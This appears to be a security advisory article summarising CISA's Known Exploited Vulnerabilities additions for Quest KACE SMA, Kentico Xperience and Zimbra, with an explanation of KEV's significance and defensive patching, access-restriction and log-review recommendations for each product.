CISAβs latest Known Exploited Vulnerabilities additions include three categories of enterprise infrastructure that collectively represent a significant breadth of confirmed active exploitation: endpoint management platforms, enterprise content management systems, and email collaboration infrastructure.
Quest KACE SMA β CVSS 10.0, Unauthenticated SQL Injection
The highest-severity addition is an unauthenticated SQL injection in Quest KACE Systems Management Appliance (CVE-2025-32975, CVSS 10.0). KACE SMA is an enterprise endpoint management and help desk platform used to manage software deployment, patch management, and asset inventory across enterprise workstations and servers.
An unauthenticated attacker with network access to the KACE management interface can extract the full appliance database β which contains endpoint inventory, patch status, software deployment configurations, helpdesk ticket content, and potentially cached credentials used for remote management tasks. In environments where KACE holds administrator credentials for managed endpoints, exploitation provides a direct path to those credentials.
The CVSS 10.0 reflects the combination: no authentication required, network exploitable, complete database disclosure. KACEβs role as an IT management plane β with knowledge of every managed deviceβs state and potentially the credentials to administer them β means exploitation has downstream access implications far beyond the appliance itself.
KACE management interfaces are frequently placed on internal network segments accessible to IT staff, which reduces exposure compared to internet-facing systems. However, threat actors operating inside enterprise networks β via phishing or compromised workstations β have the adjacency needed to exploit this without ever touching the internet perimeter.
Kentico Xperience β Exploited CMS
Kentico Xperience, an enterprise digital experience and content management platform used for corporate websites and digital portals, has been added to the KEV catalogue with confirmed exploitation. CMS platform exploitation typically serves one of three purposes: web skimming (injecting JavaScript that steals form data from visitors), watering hole attacks (modifying content to deliver malware to site visitors), or as a foothold for further access to internal infrastructure connected to the CMS.
Organisations running Kentico Xperience should treat exploitation as confirmed and investigate accordingly rather than waiting for specific indicators. The relevant audit questions are whether site content or templates have been modified unexpectedly, whether administrative user accounts have been added, and whether the CMS application has made unexpected outbound connections.
Zimbra ZCS β Continuing Active Exploitation
Zimbra Collaboration Suite appears in the KEV catalogue with a continuation of the sustained exploitation trend against Zimbra deployments that has characterised threat actor activity throughout 2025 and 2026. Zimbra deployments β spanning both open-source and commercial versions β represent a large target surface for credential harvesting, given email platform access provides attackers with authentication tokens, correspondence, and contact data.
Organisations running Zimbra should apply current security patches and conduct a thorough review of mail server authentication logs for credential-access anomalies.
What KEV Additions Mean for Vulnerability Management Programmes
The CISA KEV catalogue is the closest proxy the security industry has to a confirmed exploitation signal. CISA adds vulnerabilities to the catalogue based on evidence of active exploitation in the wild β not theoretical exploitability or vendor CVSS scores. A KEV addition means:
- Attacker tooling exists: The exploit is sufficiently reliable to be used in real attacks
- Exploitation is ongoing: Not historical β active at the time of CISAβs addition
- Federal patch deadline applies: Under BOD 22-01, federal agencies must remediate by the specified deadline (May 4 for this batch)
For enterprise organisations outside the federal government, the BOD deadline provides a useful benchmark. Treating KEV additions as P1 vulnerabilities with the same urgency as the federal deadline is a reasonable and defensible patching policy.
Recommended Actions
Quest KACE SMA:
- Immediately restrict network access to KACE management interfaces to authorised IT administration hosts only β if the management port is reachable from general workstation segments, isolate it now as a compensating control
- Apply Quest Security Advisory patches as published
- Audit KACE for new administrator accounts, export configuration changes, and unusual API access in recent logs
- Rotate any domain or local administrator credentials stored in KACE remote management configurations
Kentico Xperience:
- Review CMS content and template modifications in audit logs for the past 60 days
- Check for unauthorised administrative accounts and reset all administrative credentials
- Apply current Kentico security patches; review Kenticoβs security advisories for affected versions
- Scan public-facing pages for injected JavaScript or modified content that was not deployed through authorised change management
Zimbra ZCS:
- Apply current Zimbra security patches for your installed version
- Review authentication logs for credential stuffing, successful logins from unexpected geolocations, and IMAP/POP access to accounts that normally use webmail
- Enable two-factor authentication for Zimbra administrative and webmail access
Share this article